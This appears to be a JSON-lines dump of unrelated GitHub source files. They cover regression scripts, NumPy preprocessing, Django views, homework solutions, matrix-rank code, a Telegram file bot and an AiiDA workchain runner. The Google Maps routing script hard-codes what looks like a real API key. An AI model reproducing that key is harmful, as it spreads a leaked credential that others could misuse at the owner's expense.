sklearn.model_selection import train_test_split\r\nfrom sklearn.metrics import mean_absolute_percentage_error\r\n\r\n#preprocessing\r\n# tên xe(str), số cửa, chiều dài, mã lực, nguyên lieu(str), độ an toàn\r\ndef branch_name_process(df, column):\r\n unique_branch = list(pd.unique(df[column]))\r\n for idx, branch_name in enumerate(unique_branch):\r\n # get index\r\n index = df.index[df[column] == branch_name].tolist()\r\n df.loc[index,column] = int(idx)\r\n return df\r\n\r\ndef convert_street_to_id(value):\r\n if value==None:\r\n return 0\r\n if value =='Ngõ 4 �� tô trở lên':\r\n return 1\r\n else:\r\n return 2\r\n\r\n# Quy trinh xay dung mo hinh hoi quy tuyen tinh\r\n# b1: chon feature dac trung nao de dua mo hinh du doan\r\ndf = pd.read_csv(\"data\\Case_study_CarPrice_Assignment.csv\")\r\ndf['BranchName'] = df.apply(lambda x:str(x['CarName']).split(\" \")[0],axis=1).reset_index(drop=True)\r\n\r\n# su dung cong cu cua pandas(requirments: du lieu cot nay phai co dinh, ko thay doi)\r\ndf['BranchName'] = df['BranchName'].astype('category').cat.codes\r\n# tmp = df.corr()\r\n\r\n# print(tmp.head(1))\r\n\r\n# b2: loc nhieu(cuc ky quan trong)\r\ntarget = df[['carwidth','curbweight','enginesize','citympg','highwaympg','BranchName', 'price']]\r\n# print(target.head(5))\r\n# carwidth,curbweight,enginesize,citympg,highwaympg,BranchName, price\r\n# boxplot , 6-7 sort theo values\r\n\r\n\r\n# b3: normalizer data \r\n\r\n# b4: chon mo hinh (overview, compare cac mo hinh lai vs nhau: metrics)\r\n\r\n# linear, randomforest, bootrap\r\n# poly = PolynomialFeatures(degree=2, include_bias=False)\r\n\r\n\r\n# split du lieu\r\nX, y = target[['carwidth','curbweight','enginesize','citympg','highwaympg','BranchName']], df['price']\r\nX_train, X_test, y_train, y_test = train_test_split(X, y, test_size=0.3, random_state=42)\r\nregressor = DecisionTreeRegressor(random_state=0)\r\nregressor.fit(X_train, y_train)\r\n\r\npred = regressor.predict(X_test)\r\nprint(\"MAPE: \",mean_absolute_percentage_error(y_test, pred))\r\n# metrics\r\n\r\n# b5: finuntune hyperparameter?? girdsearch, fintune cac thong so mo hinh \r\n# Gridsearch se có hyperparameter riêng, có khi không trùng vs hyperparameter của decisiontree nên có thể ko chạy dc, cần tìm hiểu thêm nó hợp với hyperparameter nào để vọc\r\n\r\n# from sklearn.model_selection import GridSearchCV\r\n\r\n# param_grid = [\r\n# {'n_estimators': [3, 10], 'max_features': [2, 4, 6]},\r\n# {'bootstrap': [False], 'n_estimators': [3, 10], 'max_features': [2, 3, 4]},\r\n# ]\r\n# grid_search = GridSearchCV(regressor, param_grid, cv=2,\r\n# scoring='neg_mean_squared_error',\r\n# refit=True)\r\n\r\n# grid_search.fit(X_train, y_train)\r\n\r\n# grid_search.best_params_.predict(X_test)\r\n# print(\"MAPE: \",mean_absolute_percentage_error(y_test, pred))\r\n\r\n","repo_name":"Phuocialy/Thuc_hanh_Phan_tich_du_lieu","sub_path":"gia_xe.py","file_name":"gia_xe.py","file_ext":"py","file_size_in_byte":3172,"program_lang":"python","lang":"en","doc_type":"code","stars":0,"dataset":"github-code","pt":"40"} +{"seq_id":"38708393388","text":"\"\"\"\nEste archivo tiene como funcion almacenar rutas importantes que debe ser configuradas cuando se despliegue\nla aplicacion en la maquina virtual\n\"\"\"\n\nPATH_INV_EXCEL = \"C:\\\\Users\\\\compgraf\\\\Desktop\\\\Param.xlsm\"\nPATH_CODO_EXCEL = \"\\\"G:\\\\Unidades compartidas\\\\Computacion_Grafica_2020-II\\\\Modelacion_Codornices\\\\Alimentador_de_codornices\\\\Parametros\\\\ParametrosAlimentadora.xlsm\\\"\"\n\nHOJA_PARAM_INV = \"Hoja1\"\nHOJA_PARAM_CODO = \"Sheet1\"\n\nNOMBRE_MACRO_INV_EXCEL = \"Invernaderos\"\nNOMBRE_MACRO_CODO_EXCEL = \"runmacrocodornices\"\n\nCOTIZACIONES_PATH = \"\\\"G:\\\\Unidades compartidas\\\\Computacion_Grafica_2020-II\\\\Cotizaciones\\\"\"\nEXCEL_COTIZACION_PATH = \"C:\\\\Users\\\\compgraf\\\\Desktop\\\\Formato_Cotizacion.xlsx\"\n\nNOMBRE_INV_EXCEL = PATH_INV_EXCEL.split(\"\\\\\")[-1]\n# NOMBRE_CODO_EXCEL = PATH_CODO_EXCEL.split(\"\\\\\")[-1].replace(\"\\\"\")\nNOMBRE_CODO_EXCEL = \"ParametrosAlimentadora.xlsm\"","repo_name":"compugrafica20202/respuesta_automatica","sub_path":"variables.py","file_name":"variables.py","file_ext":"py","file_size_in_byte":865,"program_lang":"python","lang":"es","doc_type":"code","stars":0,"dataset":"github-code","pt":"40"} +{"seq_id":"71362849401","text":"import numpy as np\nimport os\n\n\ndef center(data):\n '''Subtract the mean over all samples and pixels, independent by channel.\n\n Expects data of the form [batch, channel, height, width].'''\n means = data.mean(axis=(0, 2, 3), keepdims=True)\n data -= means\n return means\n\ndef scale(data, std=None, mode=\"standardize\"):\n '''Scale the data to the given std over all samples and pixels, independent\n by channel.\n\n Expects data of the form [batch, channel, height, width].'''\n \n if mode == \"standardize\":\n stds = data.std(axis=(0, 2, 3), keepdims=True)\n data /= stds/std\n return stds\n elif mode == \"normalize\":\n scale_min_max(data)\n else:\n raise NotImplementedError\n\ndef channelNeighbors(points, full, axes=(2, 3), condition=lambda x:True,\n stillbad = None):\n '''Create a list of orthogonal neighbors of each point that satisfy the given\n condition.\n\n return_val[i] = [(neighbor 1 index), (neighbor 2 index), ...] for points[i]\n\n Axes specifies the directions to explore for neighbors. For example,\n specifying axes=(2, 3) will hold the first 2 indices constant and only\n adjust the 2nd and 3rd indices.\n\n Condition is a function of the potential neighbor. For example it can test\n if the neighbor is nonzero. Any neighbor for which the condition returns\n True is included.\n \n Stillbad is an optional list to hold point indices that have no neighbors\n satisfying condition. If provided, it should be specified as an empty list.'''\n # adjust the condition to apply to the data at an index rather than at the\n # index itself (as filter() would normally assume)\n condition_full = lambda x:condition(full[x])\n shape = full.shape\n all_neighbors = []\n for point in points:\n point_neighbors = []\n for axis in axes:\n test_point_low = np.asarray(point)\n test_point_up = test_point_low.copy()\n if test_point_low[axis] > 0:\n test_point_low[axis] -= 1\n point_neighbors.append(tuple(test_point_low))\n if test_point_up[axis] < shape[axis] - 1:\n test_point_up[axis] += 1\n point_neighbors.append(tuple(test_point_up))\n good_neighbors = filter(condition_full, point_neighbors)\n if len(good_neighbors) == 0:\n if stillbad is not None:\n stillbad.append(point)\n all_neighbors.append(good_neighbors)\n return all_neighbors\n\ndef fix_time_zeros(data):\n bads = zip(*np.nonzero(data == 0))\n # Only take the time channels (not the charge channels)\n bads = filter(lambda x:x[1] in (1, 3), bads)\n\n\n # Get list of neighbors for each point\n # [[point 0 neighbors], [point 1 neighbors], ...]\n stillbad = []\n neighbors = channelNeighbors(bads, data, axes=(2, 3),\n condition=lambda x:x < 0, stillbad=stillbad)\n replacements = np.hstack(np.mean(data[zip(*ns)]) if len(ns) > 0 else 0 for ns in neighbors)\n data[zip(*bads)] = replacements\n iterations = 0\n while len(stillbad) > 0 and iterations < 3:\n iterations += 1\n bads = stillbad\n stillbad = []\n neighbors = channelNeighbors(bads, data, axes=(2, 3),\n condition=lambda x:x < 0, stillbad=stillbad)\n replacements = np.hstack(np.mean(data[zip(*ns)]) if len(ns) > 0 else 0 for ns in neighbors)\n data[zip(*bads)] = replacements\n \ndef scale_min_max(data, min_=-1, max_=1, mins=None,maxes=None):\n '''scales data to be between min and max in place'''\n if mins is None or maxes is None:\n mins = data.min(axis=(0, 2, 3), keepdims=True)\n maxes = data.max(axis=(0, 2, 3), keepdims=True)\n\n #data = (max_ - min_) * ((data - mins) / (maxes - mins)) + min_\n #in place\n data -= mins\n data /= (maxes-mins)\n data *= max_ - min_\n data += min_\n return (mins, maxes)\n \ndef filter_out_zeros(X,y):\n \n #get indices of all rows that don't contain all zeroes\n nonzero_rows = ~np.all(X[:, : ]==0., axis=1)\n \n #filter for these nonzero rows\n X = X[nonzero_rows]\n y = y[nonzero_rows]\n return X,y\n\ndef get_equal_per_class(X,y, nclass):\n# #get the number of rows in X that correspond to a y for each given class, then take the class that \n# #corresponds to the fewest rows in X\n# min_classes = [X[y == float(cl)].shape[0] for cl in range(nclass)]\n# print min_classes\n# min_class_count = min(min_classes)\n# #get min_class_count rows of X for each corresponding class\n# print y.shape\n# X = np.vstack(tuple([X[y == float(cl)][:min_class_count, :] for cl in range(nclass)]))\n# y = np.vstack(tuple([y[y == float(cl)][:min_class_count] for cl in range(nclass)]))\n# print y.shape\n \n return X,y\n\n","repo_name":"NERSC/dayabay-learn","sub_path":"networks/preprocessing.py","file_name":"preprocessing.py","file_ext":"py","file_size_in_byte":4772,"program_lang":"python","lang":"en","doc_type":"code","stars":1,"dataset":"github-code","pt":"40"} +{"seq_id":"36192853338","text":"from django.shortcuts import render\nfrom rest_framework import viewsets\n\nfrom blog_app.permissions import CommentPermission\nfrom .serializers import CommentSerializer, ReplySerializer\nfrom .models import Comment, Reply\n\n\nclass CommentViewSet(viewsets.ModelViewSet):\n permission_classes = [CommentPermission]\n queryset = Comment.objects.all()\n serializer_class = CommentSerializer\n\n def perform_create(self, serializer):\n serializer.save(author=self.request.user)\n\n\nclass ReplyViewSet(viewsets.ModelViewSet):\n permission_classes = [CommentPermission]\n queryset = Reply.objects.all()\n serializer_class = ReplySerializer\n\n def perform_create(self, serializer):\n serializer.save(author=self.request.user)\n","repo_name":"mom4ilakis/Internship-Nemetschek","sub_path":"Web/Blog/blog/comment/views.py","file_name":"views.py","file_ext":"py","file_size_in_byte":739,"program_lang":"python","lang":"en","doc_type":"code","stars":0,"dataset":"github-code","pt":"40"} +{"seq_id":"45286325860","text":"import numpy as np \nfrom helper import *\n'''\nHomework2: logistic regression classifier\n'''\n\n\ndef sigmoid(z):\n '''\n Computes the sigmoid activation function\n\n :param z: numpy array\n :return: The sigmoid value of z\n '''\n return 1 / (1 + np.exp(-z))\n\ndef logistic_regression(data, label, max_iter, learning_rate):\n '''\n The logistic regression classifier function.\n\n Args:\n data: train data with shape (1561, 3), which means 1561 samples and\n each sample has 3 features.(1, symmetry, average internsity)\n label: train data's label with shape (1561,1).\n 1 for digit number 1 and -1 for digit number 5.\n max_iter: max iteration numbers\n learning_rate: learning rate for weight update\n\n Returns:\n w: the seperater with shape (3, 1). You must initilize it with w = np.zeros((d,1))\n '''\n w = np.zeros((data.shape[1], 1))\n for current_epoch in range(max_iter):\n v_t = np.zeros((data.shape[1],1))\n for (xi, yi) in zip(data, label):\n xi = xi.reshape((data.shape[1],1))\n v_t += yi * xi * sigmoid(-yi * w.T.dot(xi))\n v_t /= len(label)\n w = w + v_t * learning_rate\n return w\n\ndef thirdorder(data):\n '''\n This function is used for a 3rd order polynomial transform of the data.\n Args:\n data: input data with shape (:, 3) the first dimension represents\n total samples (training: 1561; testing: 424) and the\n second dimesion represents total features.\n\n Return:\n result: A numpy array format new data with shape (:,10), which using\n a 3rd order polynomial transformation to extend the feature numbers\n from 3 to 10.\n The first dimension represents total samples (training: 1561; testing: 424)\n and the second dimesion represents total features.\n '''\n degree = 3\n output = np.ones((data.shape[0], 1))\n x1 = data[:, 0]\n x2 = data[:, 1]\n for i in range(1, degree + 1):\n for j in range(0, i + 1):\n col = (x1 ** (i - j)) * (x2 ** j)\n col = col.reshape(col.shape[0], 1)\n output = np.append(output, col, axis = 1)\n return output\n\n\ndef accuracy(x, y, w):\n '''\n This function is used to compute accuracy of a logsitic regression model.\n \n Args:\n x: input data with shape (n, d), where n represents total data samples and d represents\n total feature numbers of a certain data sample.\n y: corresponding label of x with shape(n, 1), where n represents total data samples.\n w: the seperator learnt from logistic regression function with shape (d, 1),\n where d represents total feature numbers of a certain data sample.\n\n Return \n accuracy: total percents of correctly classified samples. Set the threshold as 0.5,\n which means, if the predicted probability > 0.5, classify as 1; Otherwise, classify as -1.\n '''\n activation = sigmoid(np.dot(x,w))\n predictions = np.where(activation > 0.5, 1, -1)\n y = y.reshape((y.shape[0], 1))\n return np.mean(predictions == y)\n\n","repo_name":"sergiovasquez122/CECS-456","sub_path":"HW2/code/solution.py","file_name":"solution.py","file_ext":"py","file_size_in_byte":3057,"program_lang":"python","lang":"en","doc_type":"code","stars":0,"dataset":"github-code","pt":"40"} +{"seq_id":"20724099801","text":"import pandas as pd\nimport numpy as np\nfrom openpyxl import load_workbook\nimport googlemaps\nimport itertools\n\ndef create_matrices(addresses, pickups, deliveries):\n maps = googlemaps.Client(key = 'AIzaSyAlrj1tmPvPqtWOixqSEOiydRyKyZiBHjo')\n \n addList = addresses.to_numpy()\n #addList = np.array(addresses)\n total = len(addList)\n\n order = np.arange(0, total, 1)\n \n #a, b = zip(*list(itertools.product(range(total), range(total))))\n #a, b = np.array(a), np.array(b)\n \n weights = np.zeros(shape=(total, total))\n times = np.zeros(shape=(total, total))\n dists = np.zeros(shape=(total, total))\n\n for i in range(total):\n for j in range(total):\n result = maps.distance_matrix(addList[i], addList[j])\n dist = result['rows'][0]['elements'][0]['distance']['text']\n dist = \" \".join(dist.split(\" \")[:-1])\n dist = dist.replace(\",\", \"\")\n dist = float(dist)\n \n time = result['rows'][0]['elements'][0]['duration']['text']\n time = \" \".join(time.split(\" \")[:-1])\n time = time.split(\" hour\")\n \n #time = time.replace(\",\", \"\")\n if len(time) > 1:\n time[1] = time[1].split(\" \")[1]\n time = float(time[0]) + (float(time[1]) / 60)\n else:\n time = float(time[0])\n \n weights[i, j] = dist / (max(pickups.iloc[j, 0], deliveries.iloc[j, 0]) + .1)\n times[i, j] = time\n dists[i, j] = dist\n\n #np.add.at(weights, (a, b), float(\" \".join(maps.distance_matrix(addList[a], addList[b])['rows'][0]['elements'][0]['distance']['text'].split(\" \")[:-1])))\n \n return(weights, times, dists)\n \n\n","repo_name":"mcowart3/routing","sub_path":"create_matrices.py","file_name":"create_matrices.py","file_ext":"py","file_size_in_byte":1736,"program_lang":"python","lang":"en","doc_type":"code","stars":0,"dataset":"github-code","pt":"40"} +{"seq_id":"1189239167","text":"import os\nimport logging\nimport time\nfrom datetime import datetime\n\nfrom pyrogram import Client, filters, idle\nfrom config import Config\nfrom func import modify_caption_to_filename, rename, file_caption, file_captions, file_caption_entities, send_caption_entities\nfrom progress import progress_bar, download_progress_bar\n\n# logging.basicConfig(format='%(asctime)s - %(name)s - %(levelname)s - %(message)s', level=logging.INFO)\nnow = datetime.now()\ncurrent_time = now.strftime(\"%H:%M:%S\")\n\nbot = Client(\"bot\",\n bot_token=Config.BOT_TOKEN,\n api_id=Config.API_ID,\n api_hash=Config.API_HASH)\nbot.start()\nme = bot.get_me()\nprint(f\"Successfully deployed @{me.username}\")\nstart_time = time.time()\n\n\n@bot.on_message(filters.command(\"start\") & filters.private & filters.incoming)\nasync def start(c, m):\n chat_id = m.from_user.id\n if chat_id == Config.OWNER_ID or chat_id == Config.ACG_ID or chat_id == Config.C_ID:\n print(f\"User_id : {chat_id} ; User_name : {m.from_user.first_name} {m.from_user.last_name}\")\n await m.reply_text(f\"HI {m.from_user.first_name}😌\\nWhat would you like to do \"\n f\"today?\\n**/sendseries\\nOR\\n/sendmovies**\")\n else:\n print(f\"User_id : {chat_id} ; User_name : {m.from_user.first_name} {m.from_user.last_name}\")\n await m.reply(f\"HI {m.from_user.first_name}\\nI don't know you 🙁\\nOops.. I know your name now😅\")\n\n\n@bot.on_message(filters.command(\"help\") & filters.private & filters.incoming)\nasync def get_help(c, m):\n await m.reply(f'**GO ASK GOOGLE**')\n\n\n@bot.on_message(filters.command(\"sendseries\") & filters.private & filters.incoming)\nasync def send_series(c, m):\n chat_id = m.from_user.id\n if chat_id == Config.ACG_ID:\n path = Config.PATH_ACGSERIES\n os.chdir(path)\n for folder in os.listdir():\n new_path = os.path.join(path + '\\\\' + folder)\n os.chdir(new_path)\n await bot.send_sticker(chat_id=m.from_user.id, sticker=f\"{Config.STICKER}{folder}.webp\")\n # await bot.send_sticker(chat_id=m.from_user.id, sticker=f\"{Config.STICKER}1.webp\")\n for file in os.listdir():\n file_name, file_ext = os.path.splitext(file)\n newname = rename(file_name) + file_ext\n os.rename(file, newname)\n for f in os.listdir():\n file_name, file_ext = os.path.splitext(f)\n print(f\"Sending file... {f} {current_time}\")\n send_message = await m.reply_text(f\"**Sending File**\\n{f}\")\n await m.reply_document(\n document=f,\n caption=file_caption(file_name),\n # caption_entities=send_caption_entities(file_name),\n thumb=Config.THUMB_ACGSERIES,\n progress=progress_bar,\n progress_args=(\"Sending:\", start_time, send_message))\n await bot.delete_messages(Config.chat_id, Config.message_id)\n # print(f\"Message Deleted Chat id : {Config.chat_id} Message id : {Config.message_id}\")\n os.chdir(new_path)\n os.remove(f)\n os.chdir(path)\n os.rmdir(folder)\n await bot.send_sticker(chat_id=m.from_user.id, sticker=Config.STICKER + \"end.webp\")\n await bot.send_sticker(chat_id=m.from_user.id, sticker=Config.STICKER + \"the_end.webp\")\n await m.reply(\"**Folder Empty**\")\n else:\n await m.reply(\"**Folder Empty**\")\n\n\n@bot.on_message(filters.command(\"sendmovies\") & filters.private & filters.incoming)\nasync def send_movies(c, m):\n chat_id = m.from_user.id\n if chat_id == Config.ACG_ID:\n os.chdir(Config.PATH_ACGMOVIES)\n for file in os.listdir():\n file_name, file_ext = os.path.splitext(file)\n newname = rename(file_name) + file_ext\n os.rename(file, newname)\n for f in os.listdir():\n file_name, file_ext = os.path.splitext(f)\n print(f\"Sending file... {f} {current_time}\")\n send_message = await m.reply_text(f\"**Sending File**\\n{f}\")\n await m.reply_document(\n document=f,\n caption=file_caption(file_name),\n # caption_entities=send_caption_entities(file_name),\n thumb=Config.THUMB_ACGMOVIES,\n progress=progress_bar,\n progress_args=(\"Sending:\", start_time, send_message)\n )\n await bot.delete_messages(Config.chat_id, Config.message_id)\n # print(f\"Message Deleted Chat id : {Config.chat_id} Message id : {Config.message_id}\")\n os.remove(f)\n await bot.send_sticker(chat_id=m.from_user.id, sticker=Config.STICKER + \"the_end.webp\")\n await m.reply(\"**Folder Empty**\")\n\n\n@bot.on_message(filters.command(\"nptel\") & filters.private & filters.incoming)\nasync def send_nptel(c, m):\n chat_id = m.from_user.id\n if chat_id == Config.OWNER_ID:\n path = Config.PATH_NPTEL\n os.chdir(path)\n for folder in os.listdir():\n new_path = os.path.join(path + '\\\\' + folder)\n os.chdir(new_path)\n await bot.send_photo(\n chat_id=m.chat.id,\n photo=Config.THUMB_NPTEL,\n caption=file_caption(folder)\n )\n for f in os.listdir():\n file_name, file_ext = os.path.splitext(f)\n print(f\"Sending file... {f}\")\n send_message = await m.reply_text(f\"**Sending File**\\n{f}\")\n await m.reply_document(\n document=f,\n caption=file_caption(file_name),\n caption_entities=send_caption_entities(file_name),\n thumb=Config.THUMB_NPTEL,\n progress=progress_bar,\n progress_args=(\"Sending:\", start_time, send_message))\n await bot.delete_messages(int(Config.chat_id), int(Config.message_id))\n os.remove(f)\n await bot.send_sticker(chat_id=m.from_user.id, sticker=Config.STICKER + \"the_end.webp\")\n await m.reply(\"**Folder Empty**\")\n\n\n@bot.on_message((filters.command(\"download\") | filters.document | filters.video) & filters.private & filters.incoming)\nasync def download(c, m):\n if m.text == \"/download\":\n await m.reply_text(\"Send Files to Download\")\n elif not m.caption:\n print(f\"{m.document.file_name}\\t already Exist\")\n else:\n os.chdir(Config.DOWNLOAD_PATH)\n filename = m.document.file_name\n file_name, file_ext = os.path.splitext(filename)\n newname = modify_caption_to_filename(m.caption, file_ext)\n if newname in os.listdir():\n print(f\"{newname} already Exist\")\n elif filename in os.listdir():\n os.rename(filename, newname)\n print(f\"{filename}\\nRenamed to \\n{newname}\")\n else:\n await m.reply(f\"{newname}\\n**Doesn't Exist**\")\n \"\"\"\n print(f\"Downloading file... {filename}\")\n send_message = await m.reply_text(f\"**Downloading File**\\n{filename}\")\n path = f\"{Config.DOWNLOAD_PATH}\\\\{filename}\"\n await m.download(\n file_name=path,\n progress=download_progress_bar,\n progress_args=(\"Downloading:\", start_time, send_message))\n await bot.delete_messages(int(Config.down_chat_id), int(Config.down_message_id))\n # print(f\"Message Deleted Chat id : {Config.down_chat_id} Message id : {Config.down_message_id}\")\n os.rename(filename, newname)\n await m.reply(f\"{newname}\\n**Downloaded**\")\n \"\"\"\n\n\n@bot.on_message(filters.photo & filters.private & filters.incoming)\nasync def photo(c, m):\n chat_id = m.from_user.id\n if chat_id == Config.OWNER_ID or chat_id == Config.ACG_ID or chat_id == Config.C_ID:\n if m.caption:\n await bot.send_photo(\n chat_id=m.chat.id,\n photo=m.photo.file_id,\n caption=file_captions(m.caption),\n caption_entities= m.caption_entities,\n # caption_entities=file_caption_entities(m.caption, m.caption_entities),\n reply_markup=m.reply_markup\n )\n await m.reply(Config.acg_caption)\n\n\nif idle():\n bot.stop()\n print(\"Ok bye 😢.\")\n","repo_name":"angelogoves/Telegram_Bot","sub_path":"main.py","file_name":"main.py","file_ext":"py","file_size_in_byte":8428,"program_lang":"python","lang":"en","doc_type":"code","stars":1,"dataset":"github-code","pt":"40"} +{"seq_id":"4567168938","text":"'''\nCreate a test class\n\n\nTest classes are containers inside test modules. They help separate tests for different functions within the test module, and serve as a structuring tool in the pytest framework.\n\nTest classes are written in CamelCase e.g. TestMyFunction as opposed to tests, which are written using underscores e.g. test_something().\n\nYou met the function split_into_training_and_testing_sets() in Chapter 2, and wrote some tests for it. One of these tests was called test_on_one_row() and it checked if the function raises a ValueError when passed a NumPy array with only one row.\n\nIn this exercise you are going to create a test class for this function. This test class will hold the test test_on_one_row().\n\nInstructions\n100 XP\n\n- Declare the test class for the function split_into_training_and_testing_sets(), making sure to give it a name that follows the standard naming convention.\n- Fill in the mandatory argument in the test test_on_one_row().\n\n'''\nimport pytest\nimport numpy as np\n\nfrom models.train import split_into_training_and_testing_sets\n\n# Declare the test class\n\n\nclass TestSplitIntoTrainingAndTestingSets(object):\n # Fill in with the correct mandatory argument\n def test_on_one_row(self):\n test_argument = np.array([[1382.0, 390167.0]])\n with pytest.raises(ValueError) as exc_info:\n split_into_training_and_testing_sets(test_argument)\n expected_error_msg = \"Argument data_array must have at least 2 rows, it actually has just 1\"\n assert exc_info.match(expected_error_msg)\n","repo_name":"chandrainf/Datacamp","sub_path":"Data Engineer with Python Track/09. Unit Testing for Data Science in Python/Chapter/03. Test Organization and Execution/02-Create a test class.py","file_name":"02-Create a test class.py","file_ext":"py","file_size_in_byte":1546,"program_lang":"python","lang":"en","doc_type":"code","stars":6,"dataset":"github-code","pt":"40"} +{"seq_id":"30960079723","text":"#!/usr/bin/env python3\n\nfrom src.operations import *\nfrom src.properties import *\nfrom src.vectors import *\nfrom tests.helper import *\nfrom m4cs.adjugate_matrices import *\nfrom m4cs.matrix_inversion import *\nfrom m4cs.orthogonal_matrices import is_singular\nfrom copy import deepcopy\n\n#### MATRIX RANK #### \n\n# thanks to user chiron on stackoverflow for these three functions\ndef ContinSubSeq(lst):\n size = lst\n ret = []\n for start in range(size):\n for end in range(start+1,size+1):\n ret.append([start, end])\n return ret\n\ndef submatrix_range(a, rows, cols):\n # as with the other submatrix function - make a copy to avoid touching master\n a = deepcopy(a)\n \n # get each value from input\n start_row, end_row = rows\n start_col, end_col = cols\n\n # make the end vals exclusive\n end_row += 1\n end_col += 1\n\n # combine these and make them into indices\n rows = slice(start_row, end_row)\n cols = slice(start_col, end_col)\n\n\n # reverse the lists to avoid problems associated with indices/list changes\n # rows.reverse()\n # cols.reverse()\n\n # i could use list slices - i dont understand why a[0:len(a)+1] works!\n \"\"\"\n for row in rows:\n a.pop(row)\n \"\"\"\n a = a[rows]\n ret = list(map(lambda x: x[cols], a))\n\n return ret\n\ndef get_submatrices(a, square=False):\n m, n = dimensions(a)\n ret = []\n\n # get the submatrices\n for start_row, end_row in ContinSubSeq(m):\n for start_col, end_col in ContinSubSeq(n):\n ret.append(submatrix_range(a, [start_row, end_row], [start_col, end_col]))\n\n # if square, filter out any mxn matrices - return this\n if square:\n return list(filter(lambda x: is_square(x), ret))\n\n return ret\n\ndef rank(a):\n rankmatrix = []\n submatrices = get_submatrices(a, square=True)\n non_singular_matrices = list(filter(lambda x: is_singular(x) == False, submatrices))\n\n largest_singular_matrix = []\n for matrix in non_singular_matrices:\n if dimensions(matrix)[0] > dimensions(largest_singular_matrix)[0]:\n largest_singular_matrix = matrix\n\n return len(largest_singular_matrix), largest_singular_matrix\n \n\ndef linearly_independent_rows(a):\n # get number of linearly independent rows\n ret = 0\n for i, row in enumerate(a):\n row_sum = [0] * len(row)\n # get the sum of rows - current row\n for j, second_row in enumerate(a):\n if j != i:\n row_sum = add_vectors(row_sum, second_row)\n if row_sum != row:\n ret += 1\n return ret\n\n# the number of linearly independent rows in a == rank(a)\ndef rank_linear_dependency(a):\n return linearly_independent_rows(a) == rank(a)[0]\n\n# let a = non-singular and pb be the rank of the matrix B. the rank of AB == pb\ndef sylvesters_lemma(a, b):\n return rank(matrix_multiplication(a, b)) == rank(b)\n\n","repo_name":"benchungiscool/pymatrix","sub_path":"m4cs/matrix_rank.py","file_name":"matrix_rank.py","file_ext":"py","file_size_in_byte":2716,"program_lang":"python","lang":"en","doc_type":"code","stars":0,"dataset":"github-code","pt":"40"} +{"seq_id":"13985886515","text":"# https://www.acmicpc.net/problem/15652\nimport sys\nsys.stdin = open('input.txt')\ninput = sys.stdin.readline\n\nN, M = map(int, input().split())\n\ndef answer(n, m, array):\n if n == M:\n print(*array)\n return\n\n for i in range(m, N+1):\n answer(n + 1, i, array + [i])\n\nanswer(0, 1, [])","repo_name":"WChan1027/Problem","sub_path":"Baekjoon/Silver/15652. N과 M (4).py","file_name":"15652. N과 M (4).py","file_ext":"py","file_size_in_byte":304,"program_lang":"python","lang":"en","doc_type":"code","stars":0,"dataset":"github-code","pt":"40"} +{"seq_id":"30529561517","text":"\"\"\"\nAdd Two Numbers\n@ Attention: 1. do not forget the last carry 2. do not forget the left linked list.\n\"\"\"\n\n\nclass Solution(object):\n def addTwoNumbers(self, p1, p2):\n \"\"\"\n :type l1: ListNode\n :type l2: ListNode\n :rtype: ListNode\n \"\"\"\n head = ListNode(0)\n tmp = head\n flag = 0\n while p1 and p2:\n val = flag + p1.val + p2.val\n if val >= 10:\n val -= 10\n flag = 1\n else:\n flag = 0\n tmp.next = ListNode(val)\n tmp = tmp.next\n p1 = p1.next\n p2 = p2.next\n if p1:\n tmp, flag = self.tail(p1, flag, tmp)\n elif p2:\n tmp, flag = self.tail(p2, flag, tmp)\n if flag:\n tmp.next = ListNode(1)\n return head.next\n\n def tail(self, p1, flag, tmp):\n while p1:\n val = flag + p1.val\n if val >= 10:\n val -= 10\n flag = 1\n else:\n flag = 0\n tmp.next = ListNode(val)\n tmp = tmp.next\n p1 = p1.next\n return tmp, flag\n\n","repo_name":"wttttt-wang/leetcode_withTopics","sub_path":"LinkedList/add-two-numbers.py","file_name":"add-two-numbers.py","file_ext":"py","file_size_in_byte":1165,"program_lang":"python","lang":"en","doc_type":"code","stars":0,"dataset":"github-code","pt":"40"} +{"seq_id":"4527440326","text":"#!/usr/bin/env python\n# -*- coding: utf-8 -*-\n\"\"\"Submit ZeoppMultistageDdecWorkChain for H2O\"\"\"\n\nimport os\nimport click\n\nfrom aiida.engine import run\nfrom aiida.plugins import DataFactory, WorkflowFactory\nfrom aiida.orm import Dict, Str\nfrom aiida import cmdline\n\n# Workchain objects\nZeoppMultistageDdecWorkChain = WorkflowFactory('lsmo.zeopp_multistage_ddec') # pylint: disable=invalid-name\n\n#Data objects\nCifData = DataFactory('cif') # pylint: disable=invalid-name\nNetworkParameters = DataFactory('zeopp.parameters') # pylint: disable=invalid-name\n\n\n@click.command('cli')\n@cmdline.utils.decorators.with_dbenv()\n@click.option('--zeopp_code', type=cmdline.params.types.CodeParamType())\n@click.option('--cp2k_code', type=cmdline.params.types.CodeParamType())\n@click.option('--ddec_code', type=cmdline.params.types.CodeParamType())\n@click.argument('ddec_atdens_path')\ndef main(zeopp_code, cp2k_code, ddec_code, ddec_atdens_path):\n \"\"\"Example usage:\n ATDENS_PATH='/home/daniele/Programs/aiida-database/data/chargemol_09_26_2017/atomic_densities/'\n verdi run run_ZeoppMultistageDdecWorkChain_H2O.py zeopp@localhost cp2k@localhost ddec@localhost $ATDENS_PATH\n \"\"\"\n\n cp2k_options = {\n 'resources': {\n 'num_machines': 1\n },\n 'max_wallclock_seconds': 10 * 60,\n 'withmpi': True,\n }\n\n ddec_options = {\n 'resources': {\n 'num_machines': 1\n },\n 'max_wallclock_seconds': 10 * 60,\n 'withmpi': False,\n }\n\n zeopp_options = {\n 'resources': {\n 'num_machines': 1\n },\n 'max_wallclock_seconds': 10 * 60,\n 'withmpi': False,\n }\n\n ddec_params = Dict(\n dict={\n 'net charge': 0.0,\n 'charge type': 'DDEC6',\n 'periodicity along A, B, and C vectors': [True, True, True],\n 'compute BOs': False,\n 'atomic densities directory complete path': ddec_atdens_path,\n 'input filename': 'valence_density',\n })\n\n zeopp_params = NetworkParameters(\n dict={\n 'ha': 'DEF', # Using high accuracy (mandatory!)\n 'res': True, # Max included, free and incl in free sphere\n 'sa': [1.86, 1.86, 1000], # Nitrogen probe to compute surface\n 'vol': [0.0, 0.0, 1000], # Geometric pore volume\n })\n\n structure = CifData(file=os.path.join(os.getcwd(), 'data/H2O.cif')).store()\n structure.label = 'H2O'\n\n inputs = {\n 'structure': structure,\n 'protocol_tag': Str('test'),\n 'metadata': {\n 'label': 'test',\n },\n 'cp2k_base': {\n 'cp2k': {\n 'code': cp2k_code,\n 'metadata': {\n 'options': cp2k_options,\n }\n }\n },\n 'ddec': {\n 'parameters': ddec_params,\n 'code': ddec_code,\n 'metadata': {\n 'options': 